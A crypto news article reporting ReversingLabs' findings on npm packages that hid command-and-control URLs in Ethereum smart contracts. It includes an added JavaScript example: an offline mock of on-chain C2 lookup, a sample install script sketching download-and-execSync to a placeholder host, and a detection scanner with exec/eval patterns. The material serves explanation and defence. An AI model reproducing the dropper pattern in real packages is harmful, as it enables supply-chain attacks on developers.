Hackers use Ethereum smart contracts to conceal malware in code libraries: report

Quick Take
- A report by ReversingLabs found that threat actors used Ethereum smart contracts to conceal two npm packages used to spread malicious instructions.
Cybercriminals are deploying a novel evasion tactic, using Ethereum smart contracts to hide the command-and-control infrastructure behind malicious npm packages, as threat actors step up attacks that abuse open-source tooling, according to a report by software security firm ReversingLabs.
The software-supply-chain campaign used the smart contracts to store the command-and-control (C2) URLs that the packages fetched at runtime, seeding malicious code into the vast ecosystem of JavaScript libraries distributed through the npm (Node Package Manager) registry.
Lucija Valentic, a ReversingLabs researcher, stated that two packages that emerged in July, “colortoolsv2” and a clone, “mimelib2,” pulled C2 URLs from onchain contracts before fetching a second-stage downloader.
A technical write-up published on Wednesday revealed that the packages executed an obfuscated script that queried an Ethereum contract for the location of the next-stage payload, rather than hard-coding the link in the package itself. Because the URL is read from contract storage, which the attacker can update at will and which no registry or hosting provider can take down, this route complicates both detection and takedown, and marks a new evasion technique rather than a new way into the victim's machine.
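To make the mechanics concrete, the following is an added example written for this article; it is not code from ReversingLabs or from the packages themselves. It shows, in JavaScript since the packages are npm modules, (1) how a dropper can ask an Ethereum node for a contract's stored string over JSON-RPC `eth_call` and ABI-decode the returned URL, run here against an offline mock RPC instead of a live node, and (2) a heuristic scanner that flags package source combining such an on-chain lookup with code execution. The contract address, the 4-byte selector (a real one would be the first four bytes of keccak256 of the function signature, which Node's standard library does not provide) and the URL are all constructed placeholders, not the campaign's indicators.

```javascript
// Added example, not ReversingLabs' or the packages' code. All indicators are
// constructed; see the lead-in. (1) C2 URL resolution via eth_call against an
// offline mock RPC; (2) a heuristic scanner for the pattern in package source.

// Hypothetical values, not the real campaign's contract, selector or URL.
const HYPOTHETICAL_CONTRACT = '0x' + 'ab'.repeat(20);   // 20-byte address
const HYPOTHETICAL_SELECTOR = '0xdeadbeef';             // 4-byte function selector
const CONSTRUCTED_C2_URL = 'https://stage2.example.invalid/payload.js';

// ABI layout of a Solidity `string` return value: word 0 = offset of the
// dynamic part (32), word 1 = byte length, then UTF-8 bytes zero-padded to 32.
const word = (n) => n.toString(16).padStart(64, '0');

function encodeAbiString(str) {
  const bytes = Buffer.from(str, 'utf8');
  const paddedLen = Math.ceil(bytes.length / 32) * 64;
  return '0x' + word(32) + word(bytes.length) + bytes.toString('hex').padEnd(paddedLen, '0');
}

function decodeAbiString(returnData) {
  const hex = returnData.replace(/^0x/, '');
  if (hex.length % 64 !== 0) throw new Error('return data is not 32-byte aligned');
  const at = (i) => hex.slice(i * 64, i * 64 + 64);
  const offset = parseInt(at(0), 16);
  if (offset % 32 !== 0) throw new Error('bad dynamic-data offset');
  const lenIdx = offset / 32;
  const length = parseInt(at(lenIdx), 16);
  const start = (lenIdx + 1) * 64;
  const data = hex.slice(start, start + length * 2);
  if (data.length !== length * 2) throw new Error('string data truncated');
  return Buffer.from(data, 'hex').toString('utf8');
}

// Offline stand-in for an Ethereum JSON-RPC endpoint. A real dropper would POST
// the identical request body to a public RPC URL over HTTPS.
function mockRpc(request) {
  if (request.method !== 'eth_call') throw new Error('unexpected method ' + request.method);
  const [{ to, data }] = request.params;
  if (to.toLowerCase() === HYPOTHETICAL_CONTRACT && data === HYPOTHETICAL_SELECTOR) {
    return { jsonrpc: '2.0', id: request.id, result: encodeAbiString(CONSTRUCTED_C2_URL) };
  }
  return { jsonrpc: '2.0', id: request.id, result: '0x' };
}

// Instead of a hard-coded URL, the package asks the chain. The contract owner
// can change the stored URL later without republishing the package.
function resolveC2FromContract(rpc, contract, selector) {
  const request = { jsonrpc: '2.0', id: 1, method: 'eth_call',
    params: [{ to: contract, data: selector }, 'latest'] };
  const response = rpc(request);
  if (!response.result || response.result === '0x') throw new Error('empty eth_call result');
  return { request, url: decodeAbiString(response.result) };
}

// Heuristic scanner: flags the combination that matters, an on-chain lookup
// plus a sink that runs what comes back. Heavily obfuscated code hides these
// strings, so pair this with a dynamic install-time check.
const INDICATORS = [
  { id: 'eth_call', re: /['"]eth_call['"]/ },
  { id: 'contract_address', re: /0x[0-9a-fA-F]{40}\b/ },
  { id: 'jsonrpc', re: /jsonrpc\s*:\s*['"]2\.0['"]/ },
  { id: 'dynamic_exec', re: /\beval\s*\(|new\s+Function\s*\(|child_process|\.exec(?:Sync)?\s*\(/ },
  { id: 'remote_fetch', re: /\bhttps?\.get\s*\(|\bfetch\s*\(/ },
];

function scanPackageSource(source) {
  const hits = INDICATORS.filter(({ re }) => re.test(source)).map(({ id }) => id);
  const onChainLookup = hits.includes('eth_call') && hits.includes('contract_address');
  const executesResult = hits.includes('dynamic_exec');
  return { indicators: hits,
    verdict: onChainLookup && executesResult ? 'block' : hits.length ? 'review' : 'clean' };
}

// Constructed sample of a suspicious install script (not the real package).
const SAMPLE_INSTALL_SCRIPT = [
  "const https = require('https');",
  "const { execSync } = require('child_process');",
  "const body = JSON.stringify({ jsonrpc: '2.0', id: 1, method: 'eth_call',",
  `  params: [{ to: '${HYPOTHETICAL_CONTRACT}', data: '${HYPOTHETICAL_SELECTOR}' }, 'latest'] });`,
  '// ... POST body to an RPC endpoint, decode the string, then:',
  '// https.get(url, (r) => ... execSync(downloadedScript))',
].join('\n');
const BENIGN_SOURCE = 'module.exports = (hex) => parseInt(hex, 16);';

if (typeof require !== 'undefined' && require.main === module) {
  const { url } = resolveC2FromContract(mockRpc, HYPOTHETICAL_CONTRACT, HYPOTHETICAL_SELECTOR);
  console.log('resolved from contract:', url);
  console.log('scan sample:', scanPackageSource(SAMPLE_INSTALL_SCRIPT));
  console.log('scan benign:', scanPackageSource(BENIGN_SOURCE));
}
```

Run with `node` to see the constructed URL come back out of the mock contract and the sample script scored `block` while the benign module scores `clean`. The scanner is deliberately conservative about what it calls `block`: a lone contract address or a lone `eth_call` is legitimate in plenty of web3 packages, so those alone only earn `review`.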
“That’s something we haven’t seen previously,” the security expert wrote, adding that it shows how quickly threat actors are improving detection evasion strategies. The operation also leaned on fake, crypto-themed GitHub repositories, complete with inflated stars and auto-generated commits, to convince developers to add the packages as dependencies.
Valentic said the malware family was taken down after being reported to npm maintainers. Meanwhile, ReversingLabs tied the incident to a broader, ongoing effort to seed malicious npm and GitHub projects presented as trading bots or crypto tools.
“Once we decided to dig deeper into the packages, we discovered evidence of a much larger campaign that was spread across both npm and GitHub, trying to lure developers into downloading repositories that included malicious npm packages,” the researcher wrote.
While the two packages were removed, they were only one piece of a broader campaign built around crypto-themed lures. Beyond the npm packages published in July, the company said the threat actors built credibility around decoy repositories such as “solana-trading-bot-v2,” which showed thousands of superficial commits, puppet maintainers, and coordinated stargazer activity, while the malicious dependency was quietly swapped between package names.
ReversingLabs had also flagged related npm campaigns that abused developer trust and open-source tooling earlier this year.
“These latest attacks by threat actors, including the creation of sophisticated attacks using blockchain and GitHub, show that attacks on repositories are evolving,” said Valentic. “Developers and development organizations alike need to be on the lookout for efforts to implant malicious code in legitimate applications, gain access to sensitive development assets, and steal sensitive data and digital assets.”
Disclaimer: The Block is an independent media outlet that delivers news, research, and data. As of November 2023, Foresight Ventures is a majority investor of The Block. Foresight Ventures invests in other companies in the crypto space. Crypto exchange Bitget is an anchor LP for Foresight Ventures. The Block continues to operate independently to deliver objective, impactful, and timely information about the crypto industry.
© 2025 The Block. All Rights Reserved. This article is provided for informational purposes only. It is not offered or intended to be used as legal, tax, investment, financial, or other advice.